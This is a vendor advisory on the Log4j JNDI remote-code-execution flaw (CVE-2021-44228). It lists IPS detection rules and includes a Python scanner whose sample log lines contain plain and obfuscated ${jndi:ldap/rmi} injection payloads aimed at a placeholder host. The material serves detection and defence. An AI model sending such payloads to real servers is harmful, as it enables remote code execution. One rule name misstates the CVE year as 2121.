Apache Log4j Vulnerability (CVE-2021-44228)

NVD (National Vulnerability Database) Reference


Background

Log4j is a powerful Java-based logging library maintained by the Apache Software Foundation.

In all Log4j versions >= 2.0-beta9 and <= 2.14.1, the JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From Log4j 2.15.0, this behavior has been disabled by default.

Endian Impact

No Endian products or services are directly impacted by this vulnerability.

Endian Detection & Protection Capabilities

The most current version of the Endian IPS ruleset (dated Dec. 12, 2021) contains the following rules that can be applied to provide protection against the vulnerability:

Rule SID   Rules Category            Rule Description
2034661    emerging-info             ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)
2034662    emerging-info             ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)
2034663    emerging-info             ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)
2034664    emerging-info             ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)
2034665    emerging-info             ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)
2034666    emerging-info             ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)
2034670    emerging-attack_response  ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain
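As an added illustration of what the "upper Bypass" and "lower Bypass" rule names above refer to (this is example code, not Endian's code and not the IPS rules themselves), the following Python detector first resolves nested ${lower:...}, ${upper:...} and ":-default" lookups the way Log4j would, then flags any log line that still contains a ${jndi: lookup. The log lines are constructed samples and example.invalid is a placeholder host.

```python
import re

# Innermost Log4j-style lookup: ${...} with no nested "${" or "}" inside.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately look for after normalisation (case-insensitive).
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _rewrite(m: "re.Match") -> str:
    """Resolve one innermost lookup if it is a case-manipulation or default-value
    lookup; leave a jndi lookup (or anything unknown) untouched so it is detected."""
    body = m.group(1)
    key, _, value = body.partition(":")
    k = key.strip().lower()
    if k == "lower":
        return value.lower()
    if k == "upper":
        return value.upper()
    # "${name:-default}" / "${::-x}": Log4j substitutes the text after ":-".
    if k != "jndi" and ":-" in body:
        return body.split(":-", 1)[1]
    return m.group(0)


def normalize_lookups(text: str) -> str:
    """Repeatedly resolve innermost lookups until nothing changes.
    Every rewrite removes at least the '${' '}' characters, so this terminates."""
    while True:
        new = _INNER.sub(_rewrite, text)
        if new == text:
            return text
        text = new


def scan_log(lines):
    """Return (line_number, normalised_line) for each line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample access-log lines (User-Agent field at the end).
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:ldap://example.invalid/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:rmi://example.invalid/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "price is ${env:PRICE:-unknown}"',
]

if __name__ == "__main__":
    for n, norm in scan_log(SAMPLE_LINES):
        print(f"line {n}: {norm}")
```

Line 5 shows why normalisation matters in both directions: a benign default-value lookup resolves to plain text and is not flagged, while the obfuscated lookups on lines 3 and 4 collapse to the same ${jndi: form as line 2.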

Conclusion

Endian will continue to monitor the situation and provide updates to this article to keep our customers as informed as possible.
